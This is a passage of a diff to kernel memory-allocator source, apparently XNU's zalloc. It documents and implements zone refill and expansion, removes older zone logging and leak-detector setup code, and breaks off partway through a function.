+/*!
+ * @defgroup Zone Refill
+ * @{
+ *
+ * @brief
+ * Functions handling The zone refill machinery.
+ *
+ * @discussion
+ * Zones are refilled based on 3 mechanisms: direct expansion, async expansion,
+ * VM-specific replenishment. Zones using VM-specific replenishment are marked
+ * with the @c z_replenishes property set.
+ *
+ * @c zalloc_ext() is the codepath that kicks the zone refill when the zone is
+ * dropping below half of its @c z_elems_rsv (0 for most zones) and will:
+ *
+ * - call @c zone_expand_locked() directly if the caller is allowed to block,
+ *
+ * - wakeup the asynchroous expansion thread call if the caller is not allowed
+ *   to block.
+ *
+ * - call @c zone_replenish_locked() to kick the replenish state machine.
+ *
+ *
+ * <h2>Synchronous expansion</h2>
+ *
+ * This mechanism is actually the only one that may refill a zone, and all the
+ * other ones funnel through this one eventually.
+ *
+ * @c zone_expand_locked() implements the core of the expansion mechanism,
+ * and will do so while a caller specified predicate is true.
+ *
+ * Zone expansion allows for up to 2 threads to concurrently refill the zone:
+ * - one VM privileged thread,
+ * - one regular thread.
+ *
+ * Regular threads that refill will put down their identity in @c z_expander,
+ * so that priority inversion avoidance can be implemented.
+ *
+ * However, VM privileged threads are allowed to use VM page reserves,
+ * which allows for the system to recover from extreme memory pressure
+ * situations, allowing for the few allocations that @c zone_gc() or
+ * killing processes require.
+ *
+ * When a VM privileged thread is also expanding, the @c z_expander_vm_priv bit
+ * is set. @c z_expander is not necessarily the identity of this VM privileged
+ * thread (it is if the VM privileged thread came in first, but wouldn't be, and
+ * could even be @c THREAD_NULL otherwise).
+ *
+ * Note that the pageout-scan daemon might be BG and is VM privileged. To avoid
+ * spending a whole pointer on priority inheritance for VM privileged threads
+ * (and other issues related to having two owners), we use the rwlock boost as
+ * a stop gap to avoid priority inversions.
+ *
+ *
+ * <h2>Chunk wiring policies</h2>
+ *
+ * Zones allocate memory in chunks of @c zone_t::z_chunk_pages pages at a time
+ * to try to minimize fragmentation relative to element sizes not aligning with
+ * a chunk size well.  However, this can grow large and be hard to fulfill on
+ * a system under a lot of memory pressure (chunks can be as long as 8 pages on
+ * 4k page systems).
+ *
+ * This is why, when under memory pressure the system allows chunks to be
+ * partially populated. The metadata of the first page in the chunk maintains
+ * the count of actually populated pages.
+ *
+ * The metadata for addresses assigned to a zone are found of 4 queues:
+ * - @c z_pageq_empty has chunk heads with populated pages and no allocated
+ *   elements (those can be targeted by @c zone_gc()),
+ * - @c z_pageq_partial has chunk heads with populated pages that are partially
+ *   used,
+ * - @c z_pageq_full has chunk heads with populated pages with no free elements
+ *   left,
+ * - @c z_pageq_va has either chunk heads for sequestered VA space assigned to
+ *   the zone forever (if @c z_va_sequester is enabled), or the first secondary
+ *   metadata for a chunk whose corresponding page is not populated in the
+ *   chunk.
+ *
+ * When new pages need to be wired/populated, chunks from the @c z_pageq_va
+ * queues are preferred.
+ *
+ *
+ * <h2>Asynchronous expansion</h2>
+ *
+ * This mechanism allows for refilling zones used mostly with non blocking
+ * callers. It relies on a thread call (@c zone_expand_callout) which will
+ * iterate all zones and refill the ones marked with @c z_async_refilling.
+ *
+ * NOTE: If the calling thread for zalloc_noblock is lower priority than
+ *       the thread_call, then zalloc_noblock to an empty zone may succeed.
+ *
+ *
+ * <h2>Dealing with zone allocations from the mach VM code</h2>
+ *
+ * The implementation of the mach VM itself uses the zone allocator
+ * for things like the vm_map_entry data structure. In order to prevent
+ * an infinite recursion problem when adding more pages to a zone, @c zalloc
+ * uses a replenish thread to refill the VM layer's zones before they have
+ * too few remaining free entries. The reserved remaining free entries
+ * guarantee that the VM routines can get entries from already mapped pages.
+ *
+ * In order for that to work, the amount of allocations in the nested
+ * case have to be bounded. There are currently 2 replenish zones, and
+ * if each needs 1 element of each zone to add a new page to itself, that
+ * gives us a minumum reserve of 2 elements.
+ *
+ * There is also a deadlock issue with the zone garbage collection thread,
+ * or any thread that is trying to free zone pages. While holding
+ * the kernel's map lock they may need to allocate new VM map entries, hence
+ * we need enough reserve to allow them to get past the point of holding the
+ * map lock. After freeing that page, the GC thread will wait in
+ * @c zone_reclaim() until the replenish threads can finish.
+ * Since there's only 1 GC thread at a time, that adds a minimum of 1 to the
+ * reserve size.
+ *
+ * Since the minumum amount you can add to a zone is 1 page,
+ * we'll use 16K (from ARM) as the refill size on all platforms.
+ *
+ * When a refill zone drops to half that available, i.e. REFILL_SIZE / 2,
+ * @c zalloc_ext() will wake the replenish thread. The replenish thread runs
+ * until at least REFILL_SIZE worth of free elements exist, before sleeping again.
+ * In the meantime threads may continue to use the reserve until there are only
+ * REFILL_SIZE / 4 elements left. Below that point only the replenish threads
+ * themselves and the GC thread may continue to use from the reserve.
  */
 
-#if defined(__LP64__)
-#define ZRECORDS_MAX            2560            /* Max records allowed in the log */
-#else
-#define ZRECORDS_MAX            1536            /* Max records allowed in the log */
-#endif
-#define ZRECORDS_DEFAULT        1024            /* default records in log if zrecs is not specificed in boot-args */
-
-static TUNABLE(uint32_t, log_records, "zrecs", ZRECORDS_DEFAULT);
+static thread_call_data_t zone_expand_callout;
 
-static void
-zone_enable_logging(zone_t z)
+static inline kma_flags_t
+zone_kma_flags(zone_t z, zalloc_flags_t flags)
 {
-       z->zlog_btlog = btlog_create(log_records, MAX_ZTRACE_DEPTH,
-           (corruption_debug_flag == FALSE) /* caller_will_remove_entries_for_element? */);
+       kma_flags_t kmaflags = KMA_KOBJECT | KMA_ZERO;
 
-       if (z->zlog_btlog) {
-               printf("zone: logging started for zone %s%s\n",
-                   zone_heap_name(z), z->z_name);
-       } else {
-               printf("zone: couldn't allocate memory for zrecords, turning off zleak logging\n");
-               z->zone_logging = false;
+       if (z->z_noencrypt) {
+               kmaflags |= KMA_NOENCRYPT;
+       }
+       if (flags & Z_NOPAGEWAIT) {
+               kmaflags |= KMA_NOPAGEWAIT;
+       }
+       if (z->z_permanent || (!z->z_destructible && z->z_va_sequester)) {
+               kmaflags |= KMA_PERMANENT;
        }
+       if (z->z_submap_idx == Z_SUBMAP_IDX_GENERAL &&
+           z->kalloc_heap != KHEAP_ID_NONE) {
+               kmaflags |= KMA_KHEAP;
+       }
+
+       return kmaflags;
 }
 
-/**
- * @function zone_setup_logging
+/*!
+ * @function zcram_and_lock()
  *
- * @abstract
- * Optionally sets up a zone for logging.
+ * @brief
+ * Prepare some memory for being usable for allocation purposes.
  *
  * @discussion
- * We recognized two boot-args:
+ * Prepare memory in <code>[addr + ptoa(pg_start), addr + ptoa(pg_end))</code>
+ * to be usable in the zone.
  *
- *     zlog=<zone_to_log>
- *     zrecs=<num_records_in_log>
+ * This function assumes the metadata is already populated for the range.
  *
- * The zlog arg is used to specify the zone name that should be logged,
- * and zrecs is used to control the size of the log.
+ * Calling this function with @c pg_start being 0 means that the memory
+ * is either a partial chunk, or a full chunk, that isn't published anywhere
+ * and the initialization can happen without locks held.
  *
- * If zrecs is not specified, a default value is used.
+ * Calling this function with a non zero @c pg_start means that we are extending
+ * an existing chunk: the memory in <code>[addr, addr + ptoa(pg_start))</code>,
+ * is already usable and published in the zone, so extending it requires holding
+ * the zone lock.
+ *
+ * @param zone          The zone to cram new populated pages into
+ * @param addr          The base address for the chunk(s)
+ * @param pg_va_new     The number of virtual pages newly assigned to the zone
+ * @param pg_start      The first newly populated page relative to @a addr.
+ * @param pg_end        The after-last newly populated page relative to @a addr.
+ * @param kind          The kind of memory assigned to the zone.
  */
 static void
-zone_setup_logging(zone_t z)
+zcram_and_lock(zone_t zone, vm_offset_t addr, uint32_t pg_va_new,
+    uint32_t pg_start, uint32_t pg_end, zone_addr_kind_t kind)
 {
-       char zone_name[MAX_ZONE_NAME]; /* Temp. buffer for the zone name */
-       char zlog_name[MAX_ZONE_NAME]; /* Temp. buffer to create the strings zlog1, zlog2 etc... */
-       char zlog_val[MAX_ZONE_NAME];  /* the zone name we're logging, if any */
+       zone_id_t zindex = zone_index(zone);
+       vm_offset_t elem_size = zone_elem_size(zone);
+       uint32_t free_start = 0, free_end = 0;
 
-       /*
-        * Don't allow more than ZRECORDS_MAX records even if the user asked for more.
-        *
-        * This prevents accidentally hogging too much kernel memory
-        * and making the system unusable.
-        */
-       if (log_records > ZRECORDS_MAX) {
-               log_records = ZRECORDS_MAX;
-       }
+       struct zone_page_metadata *meta = zone_meta_from_addr(addr);
+       uint32_t chunk_pages = zone->z_chunk_pages;
 
-       /*
-        * Append kalloc heap name to zone name (if zone is used by kalloc)
-        */
-       snprintf(zone_name, MAX_ZONE_NAME, "%s%s", zone_heap_name(z), z->z_name);
+       assert(pg_start < pg_end && pg_end <= chunk_pages);
 
-       /* zlog0 isn't allowed. */
-       for (int i = 1; i <= max_num_zones_to_log; i++) {
-               snprintf(zlog_name, MAX_ZONE_NAME, "zlog%d", i);
+       if (pg_start == 0) {
+               uint16_t chunk_len = (uint16_t)pg_end;
+               uint16_t secondary_len = ZM_SECONDARY_PAGE;
+               bool inline_bitmap = false;
 
-               if (PE_parse_boot_argn(zlog_name, zlog_val, sizeof(zlog_val)) &&
-                   track_this_zone(zone_name, zlog_val)) {
-                       z->zone_logging = true;
-                       num_zones_logged++;
-                       break;
+               if (zone->z_percpu) {
+                       chunk_len = 1;
+                       secondary_len = ZM_SECONDARY_PCPU_PAGE;
+                       assert(pg_end == zpercpu_count());
+               }
+               if (!zone->z_permanent) {
+                       inline_bitmap = zone->z_chunk_elems <= 32 * chunk_pages;
+               }
+
+               meta[0] = (struct zone_page_metadata){
+                       .zm_index         = zindex,
+                       .zm_inline_bitmap = inline_bitmap,
+                       .zm_chunk_len     = chunk_len,
+               };
+               if (kind == ZONE_ADDR_FOREIGN) {
+                       /* Never hit z_pageq_empty */
+                       meta[0].zm_alloc_size = ZM_ALLOC_SIZE_LOCK;
+               }
+
+               for (uint16_t i = 1; i < chunk_pages; i++) {
+                       meta[i] = (struct zone_page_metadata){
+                               .zm_index          = zindex,
+                               .zm_inline_bitmap  = inline_bitmap,
+                               .zm_chunk_len      = secondary_len,
+                               .zm_page_index     = i,
+                       };
+               }
+
+               free_end = (uint32_t)ptoa(chunk_len) / elem_size;
+               if (!zone->z_permanent) {
+                       zone_meta_bits_init(meta, free_end, zone->z_chunk_elems);
                }
+       } else {
+               assert(!zone->z_percpu && !zone->z_permanent);
+
+               free_end = (uint32_t)ptoa(pg_end) / elem_size;
+               free_start = (uint32_t)ptoa(pg_start) / elem_size;
+       }
+
+#if VM_MAX_TAG_ZONES
+       if (__improbable(zone->tags)) {
+               assert(kind == ZONE_ADDR_NATIVE && !zone->z_percpu);
+               ztMemoryAdd(zone, addr + ptoa(pg_start),
+                   ptoa(pg_end - pg_start));
        }
+#endif /* VM_MAX_TAG_ZONES */
 
        /*
-        * Backwards compat. with the old boot-arg used to specify single zone
-        * logging i.e. zlog Needs to happen after the newer zlogn checks
-        * because the prefix will match all the zlogn
-        * boot-args.
+        * Insert the initialized pages / metadatas into the right lists.
         */
-       if (!z->zone_logging &&
-           PE_parse_boot_argn("zlog", zlog_val, sizeof(zlog_val)) &&
-           track_this_zone(zone_name, zlog_val)) {
-               z->zone_logging = true;
-               num_zones_logged++;
+
+       zone_lock(zone);
+       assert(zone->z_self == zone);
+
+       if (pg_start != 0) {
+               assert(meta->zm_chunk_len == pg_start);
+
+               zone_meta_bits_merge(meta, free_start, free_end);
+               meta->zm_chunk_len = (uint16_t)pg_end;
+
+               /*
+                * consume the zone_meta_lock_in_partial()
+                * done in zone_expand_locked()
+                */
+               zone_meta_alloc_size_sub(zone, meta, ZM_ALLOC_SIZE_LOCK);
+               zone_meta_remqueue(zone, meta);
        }
 
+       if (zone->z_permanent || meta->zm_alloc_size) {
+               zone_meta_queue_push(zone, &zone->z_pageq_partial, meta);
+       } else {
+               zone_meta_queue_push(zone, &zone->z_pageq_empty, meta);
+               zone->z_wired_empty += zone->z_percpu ? 1 : pg_end;
+       }
+       if (pg_end < chunk_pages) {
+               /* push any non populated residual VA on z_pageq_va */
+               zone_meta_queue_push(zone, &zone->z_pageq_va, meta + pg_end);
+       }
 
-       /*
-        * If we want to log a zone, see if we need to allocate buffer space for
-        * the log.
-        *
-        * Some vm related zones are zinit'ed before we can do a kmem_alloc, so
-        * we have to defer allocation in that case.
-        *
-        * zone_init() will finish the job.
-        *
-        * If we want to log one of the VM related zones that's set up early on,
-        * we will skip allocation of the log until zinit is called again later
-        * on some other zone.
-        */
-       if (z->zone_logging && startup_phase >= STARTUP_SUB_KMEM_ALLOC) {
-               zone_enable_logging(z);
+       zone_elems_free_add(zone, free_end - free_start);
+       zone->z_elems_avail += free_end - free_start;
+       zone->z_wired_cur   += zone->z_percpu ? 1 : pg_end - pg_start;
+       if (pg_va_new) {
+               zone->z_va_cur += zone->z_percpu ? 1 : pg_va_new;
+       }
+       if (zone->z_wired_hwm < zone->z_wired_cur) {
+               zone->z_wired_hwm = zone->z_wired_cur;
        }
+
+       os_atomic_add(&zones_phys_page_mapped_count, pg_end - pg_start, relaxed);
 }
 
-/*
- * Each record in the log contains a pointer to the zone element it refers to,
- * and a small array to hold the pc's from the stack trace.  A
- * record is added to the log each time a zalloc() is done in the zone_of_interest.  For leak debugging,
- * the record is cleared when a zfree() is done.  For corruption debugging, the log tracks both allocs and frees.
- * If the log fills, old records are replaced as if it were a circular buffer.
- */
+static void
+zcram(zone_t zone, vm_offset_t addr, uint32_t pages, zone_addr_kind_t kind)
+{
+       uint32_t chunk_pages = zone->z_chunk_pages;
 
+       assert(pages % chunk_pages == 0);
+       for (; pages > 0; pages -= chunk_pages, addr += ptoa(chunk_pages)) {
+               zcram_and_lock(zone, addr, chunk_pages, 0, chunk_pages, kind);
+               zone_unlock(zone);
+       }
+}
 
-/*
- * Decide if we want to log this zone by doing a string compare between a zone name and the name
- * of the zone to log. Return true if the strings are equal, false otherwise.  Because it's not
- * possible to include spaces in strings passed in via the boot-args, a period in the logname will
- * match a space in the zone name.
- */
+void
+zone_cram_foreign(zone_t zone, vm_offset_t newmem, vm_size_t size)
+{
+       uint32_t pages = (uint32_t)atop(size);
 
-/*
- * Test if we want to log this zalloc/zfree event.  We log if this is the zone we're interested in and
- * the buffer for the records has been allocated.
- */
+       if (!from_zone_map(newmem, size, ZONE_ADDR_FOREIGN)) {
+               panic("zone_cram_foreign: foreign memory [%p] being crammed is "
+                   "outside of expected range", (void *)newmem);
+       }
+       if (!zone->z_allows_foreign) {
+               panic("zone_cram_foreign: foreign memory [%p] being crammed in "
+                   "zone '%s%s' not expecting it", (void *)newmem,
+                   zone_heap_name(zone), zone_name(zone));
+       }
+       if (size % ptoa(zone->z_chunk_pages)) {
+               panic("zone_cram_foreign: foreign memory [%p] being crammed has "
+                   "invalid size %zx", (void *)newmem, (size_t)size);
+       }
+       if (startup_phase >= STARTUP_SUB_ZALLOC) {
+               panic("zone_cram_foreign: foreign memory [%p] being crammed "
+                   "after zalloc is initialized", (void *)newmem);
+       }
 
-#define DO_LOGGING(z)           (z->zlog_btlog != NULL)
-#else /* !ZONE_ENABLE_LOGGING */
-#define DO_LOGGING(z)           0
-#endif /* !ZONE_ENABLE_LOGGING */
+       bzero((void *)newmem, size);
+       zcram(zone, newmem, pages, ZONE_ADDR_FOREIGN);
+}
+
+void
+zone_fill_initially(zone_t zone, vm_size_t nelems)
+{
+       kma_flags_t kmaflags;
+       kern_return_t kr;
+       vm_offset_t addr;
+       uint32_t pages;
+
+       assert(!zone->z_permanent && !zone->collectable && !zone->z_destructible);
+       assert(zone->z_elems_avail == 0);
+
+       kmaflags = zone_kma_flags(zone, Z_WAITOK) | KMA_PERMANENT;
+       pages = zone_alloc_pages_for_nelems(zone, nelems);
+       kr = kernel_memory_allocate(zone_submap(zone), &addr, ptoa(pages),
+           0, kmaflags, VM_KERN_MEMORY_ZONE);
+       if (kr != KERN_SUCCESS) {
+               panic("kernel_memory_allocate() of %u pages failed", pages);
+       }
+
+       zone_meta_populate(addr, ptoa(pages));
+       zcram(zone, addr, pages, ZONE_ADDR_NATIVE);
+}
+
+static vm_offset_t
+zone_allocate_va(zone_t z, zalloc_flags_t flags)
+{
+       kma_flags_t kmaflags = zone_kma_flags(z, flags) | KMA_VAONLY;
+       vm_size_t size = ptoa(z->z_chunk_pages);
+       kern_return_t kr;
+       vm_offset_t addr;
+
+       kr = kernel_memory_allocate(zone_submap(z), &addr, size, 0,
+           kmaflags, VM_KERN_MEMORY_ZONE);
+
+#if !__LP64__
+       if (kr == KERN_NO_SPACE && z->z_replenishes) {
+               /*
+                * On 32bit the zone submaps do not have as much VA
+                * available, so use the VA reserved map for this
+                * purpose.
+                */
+               vm_map_t map = zone_submaps[Z_SUBMAP_IDX_VA_RESERVE];
+               kr = kernel_memory_allocate(map, &addr, size, 0,
+                   kmaflags, VM_KERN_MEMORY_ZONE);
+       }
+#endif
+
+       if (kr == KERN_SUCCESS) {
+#if ZALLOC_EARLY_GAPS
+               if (__improbable(zone_caching_disabled < 0)) {
+                       zone_allocate_random_early_gap(z);
+               }
+#endif /* ZALLOC_EARLY_GAPS */
+               zone_meta_populate(addr, size);
+               return addr;
+       }
 
+       panic_include_zprint = TRUE;
 #if CONFIG_ZLEAKS
+       if ((zleak_state & ZLEAK_STATE_ACTIVE)) {
+               panic_include_ztrace = TRUE;
+       }
+#endif /* CONFIG_ZLEAKS */
+       zone_t zone_largest = zone_find_largest();
+       panic("zalloc: zone map exhausted while allocating from zone [%s%s], "
+           "likely due to memory leak in zone [%s%s] "
+           "(%luM, %d elements allocated)",
+           zone_heap_name(z), zone_name(z),
+           zone_heap_name(zone_largest), zone_name(zone_largest),
+           (unsigned long)zone_size_wired(zone_largest) >> 20,
+           zone_count_allocated(zone_largest));
+}
 
-/*
- * The zone leak detector, abbreviated 'zleak', keeps track of a subset of the currently outstanding
- * allocations made by the zone allocator.  Every zleak_sample_factor allocations in each zone, we capture a
- * backtrace.  Every free, we examine the table and determine if the allocation was being tracked,
- * and stop tracking it if it was being tracked.
- *
- * We track the allocations in the zallocations hash table, which stores the address that was returned from
- * the zone allocator.  Each stored entry in the zallocations table points to an entry in the ztraces table, which
- * stores the backtrace associated with that allocation.  This provides uniquing for the relatively large
- * backtraces - we don't store them more than once.
- *
- * Data collection begins when the zone map is 50% full, and only occurs for zones that are taking up
- * a large amount of virtual space.
- */
-#define ZLEAK_STATE_ENABLED             0x01    /* Zone leak monitoring should be turned on if zone_map fills up. */
-#define ZLEAK_STATE_ACTIVE              0x02    /* We are actively collecting traces. */
-#define ZLEAK_STATE_ACTIVATING          0x04    /* Some thread is doing setup; others should move along. */
-#define ZLEAK_STATE_FAILED              0x08    /* Attempt to allocate tables failed.  We will not try again. */
-uint32_t        zleak_state = 0;                /* State of collection, as above */
+static bool
+zone_expand_pred_nope(__unused zone_t z)
+{
+       return false;
+}
 
-boolean_t       panic_include_ztrace    = FALSE;        /* Enable zleak logging on panic */
-vm_size_t       zleak_global_tracking_threshold;        /* Size of zone map at which to start collecting data */
-vm_size_t       zleak_per_zone_tracking_threshold;      /* Size a zone will have before we will collect data on it */
-unsigned int    zleak_sample_factor     = 1000;         /* Allocations per sample attempt */
+static inline void
+ZONE_TRACE_VM_KERN_REQUEST_START(vm_size_t size)
+{
+#if DEBUG || DEVELOPMENT
+       VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_START,
+           size, 0, 0, 0);
+#else
+       (void)size;
+#endif
+}
 
-/*
- * Counters for allocation statistics.
- */
+static inline void
+ZONE_TRACE_VM_KERN_REQUEST_END(uint32_t pages)
+{
+#if DEBUG || DEVELOPMENT
+       task_t task = current_task();
+       if (pages && task) {
+               ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, pages);
+       }
+       VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END,
+           pages, 0, 0, 0);
+#else
+       (void)pages;
+#endif
+}
+
+static void
+zone_expand_locked(zone_t z, zalloc_flags_t flags, bool (*pred)(zone_t))
+{
+       thread_t self = current_thread();
+       bool vm_priv = (self->options & TH_OPT_VMPRIV);
+       bool clear_vm_priv;
+
+       for (;;) {
+               if (!pred) {
+                       /* NULL pred means "try just once" */
+                       pred = zone_expand_pred_nope;
+               } else if (!pred(z)) {
+                       return;
+               }
+
+               if (vm_priv && !z->z_expander_vm_priv) {
+                       /*
+                        * Claim the vm priv overcommit slot
+                        *
+                        * We do not track exact ownership for VM privileged
+                        * threads, so use the rwlock boost as a stop-gap
+                        * just in case.
+                        */
+                       set_thread_rwlock_boost();
+                       z->z_expander_vm_priv = true;
+                       clear_vm_priv = true;
+               } else {
+                       clear_vm_priv = false;
+               }
 
-/* Times two active records want to occupy the same spot */
-unsigned int z_alloc_collisions = 0;
-unsigned int z_trace_collisions = 0;
+               if (z->z_expander == NULL) {
+                       z->z_expander = self;
+                       break;
+               }
+               if (clear_vm_priv) {
+                       break;
+               }
 
-/* Times a new record lands on a spot previously occupied by a freed allocation */
-unsigned int z_alloc_overwrites = 0;
-unsigned int z_trace_overwrites = 0;
+               if (flags & Z_NOPAGEWAIT) {
+                       return;
+               }
 
-/* Times a new alloc or trace is put into the hash table */
-unsigned int z_alloc_recorded   = 0;
-unsigned int z_trace_recorded   = 0;
+               z->z_expanding_wait = true;
+               lck_spin_sleep_with_inheritor(&z->z_lock, LCK_SLEEP_DEFAULT,
+                   &z->z_expander, z->z_expander,
+                   TH_UNINT, TIMEOUT_WAIT_FOREVER);
+       }
 
-/* Times zleak_log returned false due to not being able to acquire the lock */
-unsigned int z_total_conflicts  = 0;
+       do {
+               struct zone_page_metadata *meta = NULL;
+               uint32_t new_va = 0, cur_pages = 0, min_pages = 0, pages = 0;
+               vm_page_t page_list = NULL;
+               vm_offset_t addr = 0;
+               int waited = 0;
 
-/*
- * Structure for keeping track of an allocation
- * An allocation bucket is in use if its element is not NULL
- */
-struct zallocation {
-       uintptr_t               za_element;             /* the element that was zalloc'ed or zfree'ed, NULL if bucket unused */
-       vm_size_t               za_size;                        /* how much memory did this allocation take up? */
-       uint32_t                za_trace_index; /* index into ztraces for backtrace associated with allocation */
-       /* TODO: #if this out */
-       uint32_t                za_hit_count;           /* for determining effectiveness of hash function */
-};
+               /*
+                * While we hold the zone lock, look if there's VA we can:
+                * - complete from partial pages,
+                * - reuse from the sequester list.
+                *
+                * When the page is being populated we pretend we allocated
+                * an extra element so that zone_gc() can't attempt to free
+                * the chunk (as it could become empty while we wait for pages).
+                */
+               if (!zone_pva_is_null(z->z_pageq_va)) {
+                       meta = zone_meta_queue_pop_native(z,
+                           &z->z_pageq_va, &addr);
+                       if (meta->zm_chunk_len == ZM_SECONDARY_PAGE) {
+                               cur_pages = meta->zm_page_index;
+                               meta -= cur_pages;
+                               addr -= ptoa(cur_pages);
+                               zone_meta_lock_in_partial(z, meta, cur_pages);
+                       }
+               }
+               zone_unlock(z);
 
-/* Size must be a power of two for the zhash to be able to just mask off bits instead of mod */
-uint32_t zleak_alloc_buckets = CONFIG_ZLEAK_ALLOCATION_MAP_NUM;
-uint32_t zleak_trace_buckets = CONFIG_ZLEAK_TRACE_MAP_NUM;
+               /*
+                * Do the zone leak activation here because zleak_activate()
+                * may block, and can't be done on the way out.
+                *
+                * Trigger jetsams via the vm_pageout_garbage_collect thread if
+                * we're running out of zone memory
+                */
+               zleak_activate_if_needed();
+               if (zone_map_nearing_exhaustion()) {
+                       thread_wakeup((event_t)&vm_pageout_garbage_collect);
+               }
 
-vm_size_t zleak_max_zonemap_size;
+               /*
+                * And now allocate pages to populate our VA.
+                */
+               if (z->z_percpu) {
+                       min_pages = z->z_chunk_pages;
+               } else {
+                       min_pages = (uint32_t)atop(round_page(zone_elem_size(z)));
+               }
 
-/* Hashmaps of allocations and their corresponding traces */
-static struct zallocation*      zallocations;
-static struct ztrace*           ztraces;
+               ZONE_TRACE_VM_KERN_REQUEST_START(ptoa(z->z_chunk_pages - cur_pages));
 
-/* not static so that panic can see this, see kern/debug.c */
-struct ztrace*                          top_ztrace;
+               while (pages < z->z_chunk_pages - cur_pages) {
+                       vm_page_t m = vm_page_grab();
 
-/* Lock to protect zallocations, ztraces, and top_ztrace from concurrent modification. */
-LCK_GRP_DECLARE(zleak_lock_grp, "zleak_lock");
-LCK_SPIN_DECLARE(zleak_lock, &zleak_lock_grp);
+                       if (m) {
+                               pages++;
+                               m->vmp_snext = page_list;
+                               page_list = m;
+                               vm_page_zero_fill(m);
+                               continue;
+                       }
 
-/*
- * Initializes the zone leak monitor.  Called from zone_init()
- */
-__startup_func
-static void
-zleak_init(vm_size_t max_zonemap_size)
-{
-       char                    scratch_buf[16];
-       boolean_t               zleak_enable_flag = FALSE;
+                       if (pages >= min_pages && (vm_pool_low() || waited)) {
+                               break;
+                       }
 
-       zleak_max_zonemap_size = max_zonemap_size;
-       zleak_global_tracking_threshold = max_zonemap_size / 2;
-       zleak_per_zone_tracking_threshold = zleak_global_tracking_threshold / 8;
+                       if ((flags & Z_NOPAGEWAIT) == 0) {
+                               waited++;
+                               VM_PAGE_WAIT();
+                               continue;
+                       }
 
-#if CONFIG_EMBEDDED
-       if (PE_parse_boot_argn("-zleakon", scratch_buf, sizeof(scratch_buf))) {
-               zleak_enable_flag = TRUE;
-               printf("zone leak detection enabled\n");
-       } else {
-               zleak_enable_flag = FALSE;
-               printf("zone leak detection disabled\n");
-       }
-#else /* CONFIG_EMBEDDED */
-       /* -zleakoff (flag to disable zone leak monitor) */
-       if (PE_parse_boot_argn("-zleakoff", scratch_buf, sizeof(scratch_buf))) {
-               zleak_enable_flag = FALSE;
-               printf("zone leak detection disabled\n");
-       } else {
-               zleak_enable_flag = TRUE;
-               printf("zone leak detection enabled\n");
-       }
-#endif /* CONFIG_EMBEDDED */
+                       /*
+                        * Undo everything and bail out:
+                        *
+                        * - free pages
+                        * - undo the fake allocation if any
+                        * - put the VA back on the VA page queue.
+                        */
+                       vm_page_free_list(page_list, FALSE);
+                       ZONE_TRACE_VM_KERN_REQUEST_END(pages);
 
-       /* zfactor=XXXX (override how often to sample the zone allocator) */
-       if (PE_parse_boot_argn("zfactor", &zleak_sample_factor, sizeof(zleak_sample_factor))) {
-               printf("Zone leak factor override: %u\n", zleak_sample_factor);
-       }
+                       zone_lock(z);
 
-       /* zleak-allocs=XXXX (override number of buckets in zallocations) */
-       if (PE_parse_boot_argn("zleak-allocs", &zleak_alloc_buckets, sizeof(zleak_alloc_buckets))) {
-               printf("Zone leak alloc buckets override: %u\n", zleak_alloc_buckets);
-               /* uses 'is power of 2' trick: (0x01000 & 0x00FFF == 0) */
-               if (zleak_alloc_buckets == 0 || (zleak_alloc_buckets & (zleak_alloc_buckets - 1))) {
-                       printf("Override isn't a power of two, bad things might happen!\n");
+                       if (cur_pages) {
+                               zone_meta_unlock_from_partial(z, meta, cur_pages);
+                       }
+                       if (meta) {
+                               zone_meta_queue_push(z, &z->z_pageq_va,
+                                   meta + cur_pages);
+                       }
+                       goto page_shortage;
                }
-       }
 
-       /* zleak-traces=XXXX (override number of buckets in ztraces) */
-       if (PE_parse_boot_argn("zleak-traces", &zleak_trace_buckets, sizeof(zleak_trace_buckets))) {
-               printf("Zone leak trace buckets override: %u\n", zleak_trace_buckets);
-               /* uses 'is power of 2' trick: (0x01000 & 0x00FFF == 0) */
-               if (zleak_trace_buckets == 0 || (zleak_trace_buckets & (zleak_trace_buckets - 1))) {
-                       printf("Override isn't a power of two, bad things might happen!\n");
+               /*
+                * If we didn't find pre-allocated VA, then allocate a chunk
+                * of VA here.
+                */
+               if (addr == 0) {
+                       addr = zone_allocate_va(z, flags);
+                       meta = zone_meta_from_addr(addr);
+                       new_va = z->z_chunk_pages;
                }
-       }
 
-       if (zleak_enable_flag) {
-               zleak_state = ZLEAK_STATE_ENABLED;
-       }
-}
+               kernel_memory_populate_with_pages(zone_submap(z),
+                   addr + ptoa(cur_pages), ptoa(pages), page_list,
+                   zone_kma_flags(z, flags), VM_KERN_MEMORY_ZONE);
 
-/*
- * Support for kern.zleak.active sysctl - a simplified
- * version of the zleak_state variable.
- */
-int
-get_zleak_state(void)
-{
-       if (zleak_state & ZLEAK_STATE_FAILED) {
-               return -1;
+               ZONE_TRACE_VM_KERN_REQUEST_END(pages);
+
+               zcram_and_lock(z, addr, new_va, cur_pages, cur_pages + pages,
+                   ZONE_ADDR_NATIVE);
+       } while (pred(z));
+
+page_shortage:
+       zleak_track_if_needed(z);
+
+       if (clear_vm_priv) {
+               z->z_expander_vm_priv = false;
+               clear_thread_rwlock_boost();
        }
-       if (zleak_state & ZLEAK_STATE_ACTIVE) {
-               return 1;
+       if (z->z_expander == self) {
+               z->z_expander = THREAD_NULL;
+       }
+       if (z->z_expanding_wait) {
+               z->z_expanding_wait = false;
+               wakeup_all_with_inheritor(&z->z_expander, THREAD_AWAKENED);
        }
-       return 0;
 }
 
-kern_return_t
-zleak_activate(void)
+static bool
+zalloc_needs_refill(zone_t zone)
 {
-       kern_return_t retval;
-       vm_size_t z_alloc_size = zleak_alloc_buckets * sizeof(struct zallocation);
-       vm_size_t z_trace_size = zleak_trace_buckets * sizeof(struct ztrace);
-       void *allocations_ptr = NULL;
-       void *traces_ptr = NULL;
-
-       /* Only one thread attempts to activate at a time */
-       if (zleak_state & (ZLEAK_STATE_ACTIVE | ZLEAK_STATE_ACTIVATING | ZLEAK_STATE_FAILED)) {
-               return KERN_SUCCESS;
+       if (zone->z_elems_free > zone->z_elems_rsv) {
+               return false;
        }
-
-       /* Indicate that we're doing the setup */
-       lck_spin_lock(&zleak_lock);
-       if (zleak_state & (ZLEAK_STATE_ACTIVE | ZLEAK_STATE_ACTIVATING | ZLEAK_STATE_FAILED)) {
-               lck_spin_unlock(&zleak_lock);
-               return KERN_SUCCESS;
+       if (zone->z_wired_cur < zone->z_wired_max) {
+               return true;
        }
-
